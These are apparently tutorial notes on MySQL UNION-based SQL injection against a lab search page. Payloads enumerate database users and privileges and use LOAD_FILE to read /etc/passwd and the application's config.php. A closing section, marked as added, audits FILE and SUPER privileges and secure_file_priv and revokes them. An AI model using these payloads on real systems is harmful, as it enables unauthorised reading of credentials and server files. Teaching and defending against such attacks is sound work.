Reading Files
DB User
SELECT USER()
SELECT CURRENT_USER()
SELECT user FROM mysql.user
Our UNION injection payload will be as follows:
cn' UNION SELECT 1, user(), 3, 4-- -
or
cn' UNION SELECT 1, user, 3, 4 FROM mysql.user-- -
Which tells us our current user, which in this case is root:

User Privileges
SELECT super_priv FROM mysql.user
Once again, we can use the following payload with the above query:
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
If we had many users within the DBMS, we can add WHERE user="root" to only show privileges for our current user root:
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
The query returns Y, which means YES, indicating superuser privileges. We can also dump other privileges we have directly from the schema, with the following query:
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
From here, we can add WHERE grantee="'root'@'localhost'" to only show the privileges of our current user root. Our payload would be:
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
And we see all of the possible privileges given to our current user:

LOAD_FILE
SELECT LOAD_FILE('/etc/passwd');
Note: We will only be able to read the file if the OS user running MySQL has enough privileges to read it.
Similar to how we have been using a UNION injection, we can use the above query:
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
Another Example
We know that the current page is search.php. The default Apache webroot is /var/www/html. Let us try reading the source code of the file at /var/www/html/search.php:
cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -
However, the page ends up rendering the HTML code within the browser. The HTML source can be viewed by hitting [Ctrl + U].
The same approach reads the application's configuration file:
' UNION SELECT 1, load_file('/var/www/html/config.php'), 3, 4-- -
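The two sections above (User Privileges and LOAD_FILE) turn on the same thing from the defender's side: which accounts hold the FILE/SUPER privileges that make LOAD_FILE work, and whether the server's secure_file_priv setting restricts file reads at all. The following is an added audit-and-remediation script for a MySQL DBA, not part of the original notes; the account name 'webapp'@'localhost' is a placeholder for whatever account the web application connects as.

```sql
-- Added audit example (not from the original notes): find which accounts can
-- read server-side files via LOAD_FILE, and whether the server restricts it.

-- 1. Accounts holding the global FILE privilege, which LOAD_FILE requires.
--    Grantees appear in the same 'user'@'host' form the notes above show.
SELECT grantee
FROM information_schema.user_privileges
WHERE privilege_type = 'FILE';

-- 2. The same check from mysql.user: super_priv = 'Y' is the signal the notes
--    above used for a DBA-level account; file_priv = 'Y' is the one that
--    matters for LOAD_FILE specifically.
SELECT user, host, super_priv, file_priv
FROM mysql.user
WHERE super_priv = 'Y' OR file_priv = 'Y';

-- 3. Server-side restriction. An empty string means LOAD_FILE may read any
--    file the mysqld OS user can open; NULL disables import/export entirely;
--    a directory path limits reads to that directory.
SELECT @@global.secure_file_priv;

-- 4. Remediation: a web application account should hold neither privilege.
--    'webapp'@'localhost' is a placeholder account name.
REVOKE FILE ON *.* FROM 'webapp'@'localhost';
REVOKE SUPER ON *.* FROM 'webapp'@'localhost';

-- 5. Verify from that account's session: LOAD_FILE returns NULL when the
--    privilege or secure_file_priv blocks the read.
SELECT LOAD_FILE('/etc/passwd') IS NULL AS load_file_blocked;
```

secure_file_priv is read-only at runtime, so step 3 only reports it; changing it means setting secure_file_priv in the server's configuration file (NULL to disable file import/export, or a dedicated directory) and restarting mysqld. Revoking FILE from the application account is the change that takes effect immediately.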